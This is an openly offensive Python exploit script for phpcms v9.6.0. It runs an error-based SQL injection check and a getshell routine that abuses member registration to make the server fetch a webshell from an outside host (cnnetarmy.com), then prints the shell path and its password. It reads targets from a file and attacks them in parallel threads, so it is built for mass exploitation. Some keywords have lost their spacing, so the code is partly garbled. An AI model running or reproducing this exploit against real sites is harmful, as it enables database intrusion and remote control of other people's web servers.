# phpcms v9.6.0 sqli and getshell
# code by : whoam1
# blog : http://www.cnnetarmy.com
importrequests
importrandom
importstring
importhashlib
importre
importthreading
defsqli(host):
try:
url1 = '{}/index.php?m=wap&c=index&a=int&siteid=1'.format(host)
s =requests.Session()
req = s.get(url1)
flag = ''.join([random.choice(string.digits) for _ in range(2)])
flag_hash = hashlib.md5(flag).hexdigest()
url2 = '{}/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id=%*27%20and%20updatexml%281%2Cconcat%281%2C%28md5%28{}%29%29%29%2C1%29%23%26m%3D1%26f%3Dhaha%26modelid%3D2%26catid%3D7%26'.format(host,flag)
cookie = requests.utils.dict_from_cookiejar(s.cookies)
cookies = re.findall(r"siteid': '(.*?)'",str(cookie))[0]
data = {"userid_flash":cookies}
r = s.post(url=url2,data=data)
a_k = r.headers['Set-Cookie'][61:]
url3 = '{}/index.php?m=content&c=down&a_k={}'.format(host,a_k)
if flag_hash[16:] in s.get(url3).content:
print '[*] SQL injection Ok!'
else:
print '[!] SQL injection ERROR.'
except:
print 'requests error.'
pass
defgetshell(host):
try:
url = '%s/index.php?m=member&c=index&a=register&siteid=1' % host
flag = ''.join([random.choice(string.lowercase) for _ in range(8)])
flags = ''.join([random.choice(string.digits) for _ in range(8)])
headers = {
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Encoding':'gzip, deflate',
'Accept-Language':'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
'Upgrade-Insecure-Requests':'1',
'Content-Type': 'application/x-www-form-urlencoded',
'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0'}
data = "siteid=1&modelid=11&username={}&password=ad{}min&email={}@cnnetarmy.com&info%5Bcontent%5D=%3Cimg%20src=http://www.cnnetarmy.com/soft/shell.txt?.php#.jpg>&dosubmit=1&protocol=".format(flag,flags,flag)
r = requests.post(url=url,headers=headers,data=data,timeout=5)
#print r.content
shell_path = re.findall(r'lt;img src=(.*?)>',str(r.content))[0]
print '[*] shell: %s | pass is: cmd' % shell_path
withopen('sql_ok.txt','a')as tar:
tar.write(shell_path)
tar.write('\n')
except:
print 'requests error.'
pass
if __name__ == '__main__':
#sqli('http://127.0.0.1/phpcms960/install_package')
#getshell('http://127.0.0.1/phpcms960/install_package')
tsk = []
f =open('target.txt','r')
for i in f.readlines():
url = i.strip()
t = threading.Thread(target = sqli,args = (url,))
tsk.append(t)
for t in tsk:
t.start()
t.join(0.1)